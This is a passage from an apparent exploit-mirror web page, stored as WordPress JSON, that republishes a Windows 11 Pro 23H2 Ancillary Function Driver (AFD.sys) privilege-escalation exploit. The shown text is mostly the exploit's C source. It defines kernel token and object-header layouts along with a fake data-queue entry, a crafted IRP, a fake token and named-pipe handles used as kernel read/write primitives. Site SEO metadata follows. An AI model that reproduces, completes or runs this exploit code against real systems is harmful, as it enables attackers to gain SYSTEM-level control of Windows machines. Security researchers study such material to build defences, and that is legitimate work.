\/>\n<br \/>    \/\/FILE_FULL_EA_INFORMATION<br \/>\n<br \/>    ULONG NextEntryOffset;<br \/>\n<br \/>    WORD Flags;<br \/>\n<br \/>    UCHAR EaNameLength;<br \/>\n<br \/>    USHORT EaValueLength;<br \/>\n<br \/>    CHAR EaName[15];<\/p>\n<p>    \/\/AFD_CREATE_PACKET<br \/>\n<br \/>    ULONG EndpointFlags;<br \/>\n<br \/>    ULONG GroupID;<br \/>\n<br \/>    ULONG AddressFamily;<br \/>\n<br \/>    ULONG SocketType;<br \/>\n<br \/>    ULONG Protocol;<br \/>\n<br \/>    ULONG SizeOfTransportName;<br \/>\n<br \/>    wchar_t TransportName[16];<br \/>\n<br \/>    \/\/UCHAR Unkown;<br \/>\n<br \/>} AFD_CREATE_PACKET;<\/p>\n<p>enum THREADINFOCLASS { ThreadImpersonationToken = 5 };<\/p>\n<p>enum SYSTEM_INFORMATION_CLASS {<br \/>\n<br \/>    SystemModuleInformation = 11,<br \/>\n<br \/>    SystemExtendedHandleInformation = 64<br \/>\n<br \/>};<\/p>\n<p>typedef enum EVENT_TYPE {<br \/>\n<br \/>    NotificationEvent,<br \/>\n<br \/>    SynchronizationEvent<br \/>\n<br \/>};<\/p>\n<p>typedef struct _AFD_BIND_DATA {<br \/>\n<br \/>    ULONG ShareType;<br \/>\n<br \/>    SOCKADDR_IN addr;<br \/>\n<br \/>} AFD_BIND_DATA, * PAFD_BIND_DATA;<\/p>\n<p>typedef struct alignas(16) MY_AFD_CONNECT_INFO<br \/>\n<br \/>{<br \/>\n<br \/>    __int64 UseSan;<br \/>\n<br \/>    __int64 hNtSock1;<br \/>\n<br \/>    __int64 Unknown;<br \/>\n<br \/>    __int32 tmp6;<br \/>\n<br \/>    WORD const_16;<br \/>\n<br \/>    sockaddr_in bind;<br \/>\n<br \/>};<\/p>\n<p>typedef struct FAKE_DATA_ENTRY_QUEUE<br \/>\n<br \/>{<br \/>\n<br \/>    DWORD tmp;<br \/>\n<br \/>    LIST_ENTRY nextQueue;<br \/>\n<br \/>    __int64 unknown;<br \/>\n<br \/>    PVOID security_client_context;<br \/>\n<br \/>    __int64 unknown2;<br \/>\n<br \/>    __int64 sizeOfData;<br \/>\n<br \/>    char DATA[0x77FD0];<br \/>\n<br \/>};<\/p>\n<p>typedef struct _AFD_LISTEN_INFO {<\/p>\n<p>    ULONG unknown;<br \/>\n<br \/>    __int64 MaximumConnectionQueue;<br \/>\n<br \/>} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;<\/p>\n<p>typedef struct _SECURITY_CLIENT_CONTEXT<br \/>\n<br \/>{<br \/>\n<br \/>    _SECURITY_QUALITY_OF_SERVICE SecurityQos;<br \/>\n<br \/>    void* ClientToken;<br \/>\n<br \/>    unsigned __int8 DirectlyAccessClientToken;<br \/>\n<br \/>    unsigned __int8 DirectAccessEffectiveOnly;<br \/>\n<br \/>    unsigned __int8 ServerIsRemote;<br \/>\n<br \/>    _TOKEN_CONTROL ClientTokenControl;<br \/>\n<br \/>}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;<\/p>\n<p>struct __declspec(align(8)) _OWNER_ENTRY<br \/>\n<br \/>{<br \/>\n<br \/>    unsigned __int64 OwnerThread;<br \/>\n<br \/>    DWORD ___u1;<br \/>\n<br \/>};<\/p>\n<p>\/\/0x68 bytes (sizeof)<br \/>\n<br \/>typedef struct _ERESOURCE<br \/>\n<br \/>{<br \/>\n<br \/>    struct _LIST_ENTRY SystemResourcesList; \/\/0x0<br \/>\n<br \/>    struct _OWNER_ENTRY* OwnerTable; \/\/0x10<br \/>\n<br \/>    SHORT ActiveCount; \/\/0x18<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        USHORT Flag; \/\/0x1a<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            UCHAR ReservedLowFlags; \/\/0x1a<br \/>\n<br \/>            UCHAR WaiterPriority; \/\/0x1b<br \/>\n<br \/>        };<br \/>\n<br \/>    };<br \/>\n<br \/>    VOID* SharedWaiters; \/\/0x20<br \/>\n<br \/>    VOID* ExclusiveWaiters; \/\/0x28<br \/>\n<br \/>    struct _OWNER_ENTRY OwnerEntry; \/\/0x30<br \/>\n<br \/>    ULONG ActiveEntries; \/\/0x40<br \/>\n<br \/>    ULONG ContentionCount; \/\/0x44<br \/>\n<br \/>    ULONG NumberOfSharedWaiters; \/\/0x48<br \/>\n<br \/>    ULONG NumberOfExclusiveWaiters; \/\/0x4c<br \/>\n<br \/>    VOID* Reserved2; \/\/0x50<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        VOID* Address; \/\/0x58<br \/>\n<br \/>        ULONGLONG CreatorBackTraceIndex; \/\/0x58<br \/>\n<br \/>    };<br \/>\n<br \/>    ULONGLONG SpinLock; \/\/0x60<br \/>\n<br \/>}ERESOURCE, *PERESOURCE;<\/p>\n<p>\/\/0x8 bytes (sizeof)<br \/>\n<br \/>typedef struct _EX_PUSH_LOCK<br \/>\n<br \/>{<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONGLONG Locked : 1; \/\/0x0<br \/>\n<br \/>            ULONGLONG Waiting : 1; \/\/0x0<br \/>\n<br \/>            ULONGLONG Waking : 1; \/\/0x0<br \/>\n<br \/>            ULONGLONG MultipleShared : 1; \/\/0x0<br \/>\n<br \/>            ULONGLONG Shared : 60; \/\/0x0<br \/>\n<br \/>        };<br \/>\n<br \/>        ULONGLONG Value; \/\/0x0<br \/>\n<br \/>        VOID* Ptr; \/\/0x0<br \/>\n<br \/>    };<br \/>\n<br \/>};<\/p>\n<p>\/\/0x10 bytes (sizeof)<br \/>\n<br \/>typedef struct _SEP_CACHED_HANDLES_TABLE<br \/>\n<br \/>{<br \/>\n<br \/>    struct _EX_PUSH_LOCK Lock; \/\/0x0<br \/>\n<br \/>    struct _RTL_DYNAMIC_HASH_TABLE* HashTable; \/\/0x8<br \/>\n<br \/>};<\/p>\n<p>\/\/0x8 bytes (sizeof)<br \/>\n<br \/>typedef struct _EX_RUNDOWN_REF<br \/>\n<br \/>{<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        ULONGLONG Count; \/\/0x0<br \/>\n<br \/>        VOID* Ptr; \/\/0x0<br \/>\n<br \/>    };<br \/>\n<br \/>};<\/p>\n<p>\/\/0x20 bytes (sizeof)<br \/>\n<br \/>typedef struct _OB_HANDLE_REVOCATION_BLOCK<br \/>\n<br \/>{<br \/>\n<br \/>    struct _LIST_ENTRY RevocationInfos; \/\/0x0<br \/>\n<br \/>    struct _EX_PUSH_LOCK Lock; \/\/0x10<br \/>\n<br \/>    struct _EX_RUNDOWN_REF Rundown; \/\/0x18<br \/>\n<br \/>};<\/p>\n<p>\/\/0xc0 bytes (sizeof)<br \/>\n<br \/>typedef struct _SEP_LOGON_SESSION_REFERENCES<br \/>\n<br \/>{<br \/>\n<br \/>    struct _SEP_LOGON_SESSION_REFERENCES* Next; \/\/0x0<br \/>\n<br \/>    struct _LUID LogonId; \/\/0x8<br \/>\n<br \/>    struct _LUID BuddyLogonId; \/\/0x10<br \/>\n<br \/>    LONGLONG ReferenceCount; \/\/0x18<br \/>\n<br \/>    ULONG Flags; \/\/0x20<br \/>\n<br \/>    struct _DEVICE_MAP* pDeviceMap; \/\/0x28<br \/>\n<br \/>    VOID* Token; \/\/0x30<br \/>\n<br \/>    struct _UNICODE_STRING AccountName; \/\/0x38<br \/>\n<br \/>    struct _UNICODE_STRING AuthorityName; \/\/0x48<br \/>\n<br \/>    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; \/\/0x58<br \/>\n<br \/>    struct _EX_PUSH_LOCK SharedDataLock; \/\/0x68<br \/>\n<br \/>    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;<br \/>\n<br \/>\/\/0x70<br \/>\n<br \/>    struct _SEP_SID_VALUES_BLOCK* SharedSidValues; \/\/0x78<br \/>\n<br \/>    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; \/\/0x80<br \/>\n<br \/>    struct _EJOB* ServerSilo; \/\/0xa0<br \/>\n<br \/>    struct _LUID SiblingAuthId; \/\/0xa8<br \/>\n<br \/>    struct _LIST_ENTRY TokenList; \/\/0xb0<br \/>\n<br \/>};<br \/>\n<br \/>\/\/0x30 bytes (sizeof)<br \/>\n<br \/>typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION<br \/>\n<br \/>{<br \/>\n<br \/>    ULONG SecurityAttributeCount; \/\/0x0<br \/>\n<br \/>    struct _LIST_ENTRY SecurityAttributesList; \/\/0x8<br \/>\n<br \/>    ULONG WorkingSecurityAttributeCount; \/\/0x18<br \/>\n<br \/>    struct _LIST_ENTRY WorkingSecurityAttributesList; \/\/0x20<br \/>\n<br \/>}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;<\/p>\n<p>\/\/0x20 bytes (sizeof)<br \/>\n<br \/>typedef struct _SEP_SID_VALUES_BLOCK<br \/>\n<br \/>{<br \/>\n<br \/>    ULONG BlockLength; \/\/0x0<br \/>\n<br \/>    LONGLONG ReferenceCount; \/\/0x8<br \/>\n<br \/>    ULONG SidCount; \/\/0x10<br \/>\n<br \/>    ULONGLONG SidValuesStart; \/\/0x18<br \/>\n<br \/>}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;<\/p>\n<p>\/\/0x18 bytes (sizeof)<br \/>\n<br \/>struct _SEP_TOKEN_PRIVILEGES<br \/>\n<br \/>{<br \/>\n<br \/>    ULONGLONG Present; \/\/0x0<br \/>\n<br \/>    ULONGLONG Enabled; \/\/0x8<br \/>\n<br \/>    ULONGLONG EnabledByDefault; \/\/0x10<br \/>\n<br \/>};<\/p>\n<p>\/\/0x1f bytes (sizeof)<br \/>\n<br \/>struct _SEP_AUDIT_POLICY<br \/>\n<br \/>{<br \/>\n<br \/>    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; \/\/0x0<br \/>\n<br \/>    UCHAR PolicySetStatus; \/\/0x1e<br \/>\n<br \/>};<\/p>\n<p>\/\/0x498 bytes (sizeof)<br \/>\n<br \/>struct _TOKEN<br \/>\n<br \/>{<br \/>\n<br \/>    struct _TOKEN_SOURCE TokenSource; \/\/0x0<br \/>\n<br \/>    struct _LUID TokenId; \/\/0x10<br \/>\n<br \/>    struct _LUID AuthenticationId; \/\/0x18<br \/>\n<br \/>    struct _LUID ParentTokenId; \/\/0x20<br \/>\n<br \/>    union _LARGE_INTEGER ExpirationTime; \/\/0x28<br \/>\n<br \/>    struct _ERESOURCE* TokenLock; \/\/0x30<br \/>\n<br \/>    struct _LUID ModifiedId; \/\/0x38<br \/>\n<br \/>    struct _SEP_TOKEN_PRIVILEGES Privileges; \/\/0x40<br \/>\n<br \/>    struct _SEP_AUDIT_POLICY AuditPolicy; \/\/0x58<br \/>\n<br \/>    ULONG SessionId; \/\/0x78<br \/>\n<br \/>    ULONG UserAndGroupCount; \/\/0x7c<br \/>\n<br \/>    ULONG RestrictedSidCount; \/\/0x80<br \/>\n<br \/>    ULONG VariableLength; \/\/0x84<br \/>\n<br \/>    ULONG DynamicCharged; \/\/0x88<br \/>\n<br \/>    ULONG DynamicAvailable; \/\/0x8c<br \/>\n<br \/>    ULONG DefaultOwnerIndex; \/\/0x90<br \/>\n<br \/>    struct _SID_AND_ATTRIBUTES* UserAndGroups; \/\/0x98<br \/>\n<br \/>    struct _SID_AND_ATTRIBUTES* RestrictedSids; \/\/0xa0<br \/>\n<br \/>    VOID* PrimaryGroup; \/\/0xa8<br \/>\n<br \/>    ULONG* DynamicPart; \/\/0xb0<br \/>\n<br \/>    struct _ACL* DefaultDacl; \/\/0xb8<br \/>\n<br \/>    enum _TOKEN_TYPE TokenType; \/\/0xc0<br \/>\n<br \/>    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; \/\/0xc4<br \/>\n<br \/>    ULONG TokenFlags; \/\/0xc8<br \/>\n<br \/>    UCHAR TokenInUse; \/\/0xcc<br \/>\n<br \/>    ULONG IntegrityLevelIndex; \/\/0xd0<br \/>\n<br \/>    ULONG MandatoryPolicy; \/\/0xd4<br \/>\n<br \/>    void* LogonSession; \/\/0xd8<br \/>\n<br \/>    struct _LUID OriginatingLogonSession; \/\/0xe0<br \/>\n<br \/>    struct _SID_AND_ATTRIBUTES_HASH SidHash; \/\/0xe8<br \/>\n<br \/>    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; \/\/0x1f8<br \/>\n<br \/>    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*<br \/>\n<br \/>pSecurityAttributes; \/\/0x308<br \/>\n<br \/>    VOID* Package; \/\/0x310<br \/>\n<br \/>    struct _SID_AND_ATTRIBUTES* Capabilities; \/\/0x318<br \/>\n<br \/>    ULONG CapabilityCount; \/\/0x320<br \/>\n<br \/>    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; \/\/0x328<br \/>\n<br \/>    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; \/\/0x438<br \/>\n<br \/>    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; \/\/0x440<br \/>\n<br \/>    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;<br \/>\n<br \/>\/\/0x448<br \/>\n<br \/>    VOID* TrustLevelSid; \/\/0x450<br \/>\n<br \/>    struct _TOKEN* TrustLinkedToken; \/\/0x458<br \/>\n<br \/>    VOID* IntegrityLevelSidValue; \/\/0x460<br \/>\n<br \/>    struct _SEP_SID_VALUES_BLOCK* TokenSidValues; \/\/0x468<br \/>\n<br \/>    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; \/\/0x470<br \/>\n<br \/>    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; \/\/0x478<br \/>\n<br \/>    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; \/\/0x480<br \/>\n<br \/>    VOID* SessionObject; \/\/0x488<br \/>\n<br \/>    ULONGLONG VariablePart; \/\/0x490<br \/>\n<br \/>};<\/p>\n<p>\/\/0x38 bytes (sizeof)<br \/>\n<br \/>struct _OBJECT_HEADER<br \/>\n<br \/>{<br \/>\n<br \/>    LONGLONG PointerCount; \/\/0x0<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        LONGLONG HandleCount; \/\/0x8<br \/>\n<br \/>        VOID* NextToFree; \/\/0x8<br \/>\n<br \/>    };<br \/>\n<br \/>    struct _EX_PUSH_LOCK Lock; \/\/0x10<br \/>\n<br \/>    UCHAR TypeIndex; \/\/0x18<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        UCHAR TraceFlags; \/\/0x19<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            UCHAR DbgRefTrace : 1; \/\/0x19<br \/>\n<br \/>            UCHAR DbgTracePermanent : 1; \/\/0x19<br \/>\n<br \/>        };<br \/>\n<br \/>    };<br \/>\n<br \/>    UCHAR InfoMask; \/\/0x1a<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        UCHAR Flags; \/\/0x1b<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            UCHAR NewObject : 1; \/\/0x1b<br \/>\n<br \/>            UCHAR KernelObject : 1; \/\/0x1b<br \/>\n<br \/>            UCHAR KernelOnlyAccess : 1; \/\/0x1b<br \/>\n<br \/>            UCHAR ExclusiveObject : 1; \/\/0x1b<br \/>\n<br \/>            UCHAR PermanentObject : 1; \/\/0x1b<br \/>\n<br \/>            UCHAR DefaultSecurityQuota : 1; \/\/0x1b<br \/>\n<br \/>            UCHAR SingleHandleEntry : 1; \/\/0x1b<br \/>\n<br \/>            UCHAR DeletedInline : 1; \/\/0x1b<br \/>\n<br \/>        };<br \/>\n<br \/>    };<br \/>\n<br \/>    ULONG Reserved; \/\/0x1c<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; \/\/0x20<br \/>\n<br \/>        VOID* QuotaBlockCharged; \/\/0x20<br \/>\n<br \/>    };<br \/>\n<br \/>    VOID* SecurityDescriptor; \/\/0x28<br \/>\n<br \/>    struct _TOKEN Body; \/\/0x30<br \/>\n<br \/>};<\/p>\n<p>struct mm {<br \/>\n<br \/>    void* fake_data_entry;<br \/>\n<br \/>    void* input;<br \/>\n<br \/>    _IRP* crafted_irp;<br \/>\n<br \/>    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;<br \/>\n<br \/>    void* p_mem_0x30;<br \/>\n<br \/>    void* p_mem_0xD0_2;<br \/>\n<br \/>    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;<br \/>\n<br \/>    ACL* VariablePartDefaultDacl;<br \/>\n<br \/>    ACL* VariablePartDefaultDacl2;<br \/>\n<br \/>    _ERESOURCE* TokenLock;<br \/>\n<br \/>    void* PrimaryGroup;<br \/>\n<br \/>    int sizeOfClientTokenAndObjectHeader;<br \/>\n<br \/>    PSEP_SID_VALUES_BLOCK TokenSidValues;<br \/>\n<br \/>    _SECURITY_CLIENT_CONTEXT* security_client_context;<br \/>\n<br \/>    _SEP_LOGON_SESSION_REFERENCES* LogonSession;<br \/>\n<br \/>    _TOKEN* fakeToken;<br \/>\n<br \/>    void *pipe_100_im_control_block;<br \/>\n<br \/>    void* pipe_100_rw_control_block;<br \/>\n<br \/>    void* p_mem_Pipe_hToPipe_1000_rw;<br \/>\n<br \/>    void* p_mem_Pipe_hToPipe_1000_rw_2;<br \/>\n<br \/>    HANDLE hPipeIM;<br \/>\n<br \/>    HANDLE hPipeRW;<br \/>\n<br \/>    HANDLE hFileIM;<br \/>\n<br \/>    HANDLE hFileRW;<br \/>\n<br \/>    HANDLE IncPrimitiveTOKEN;<br \/>\n<br \/>    HANDLE RWPrimitiveTOKEN;<br \/>\n<br \/>};<\/p>\n<p>\/\/0x18 bytes (sizeof)<br \/>\n<br \/>struct _DISPATCHER_HEADER<br \/>\n<br \/>{<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        volatile LONG Lock; \/\/0x0<br \/>\n<br \/>        LONG LockNV; \/\/0x0<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            UCHAR Type; \/\/0x0<br \/>\n<br \/>            UCHAR Signalling; \/\/0x1<br \/>\n<br \/>            UCHAR Size; \/\/0x2<br \/>\n<br \/>            UCHAR Reserved1; \/\/0x3<br \/>\n<br \/>        };<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            UCHAR TimerType; \/\/0x0<br \/>\n<br \/>            union<br \/>\n<br \/>            {<br \/>\n<br \/>                UCHAR TimerControlFlags; \/\/0x1<br \/>\n<br \/>                struct<br \/>\n<br \/>                {<br \/>\n<br \/>                    UCHAR Absolute : 1;\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52284\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation Exploit ID EDB-ID:52284 Type exploitdb Published&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,40,15,13,7,11,5],"class_list":["post-3807","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=3807\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation Exploit ID EDB-ID:52284 Type exploitdb Published...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=3807\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-09T14:43:21+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3807#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3807\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation\",\"datePublished\":\"2025-05-09T14:43:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3807\"},\"wordCount\":2400,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3807#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3807\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3807\",\"name\":\"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-09T14:43:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3807#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3807\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3807#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=3807","og_locale":"en_US","og_type":"article","og_title":"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation Exploit ID EDB-ID:52284 Type exploitdb Published...","og_url":"https:\/\/zero.redgem.net\/?p=3807","og_site_name":"zero redgem","article_published_time":"2025-05-09T14:43:21+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=3807#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=3807"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation","datePublished":"2025-05-09T14:43:21+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=3807"},"wordCount":2400,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=3807#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=3807","url":"https:\/\/zero.redgem.net\/?p=3807","name":"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-09T14:43:21+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=3807#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=3807"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=3807#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero 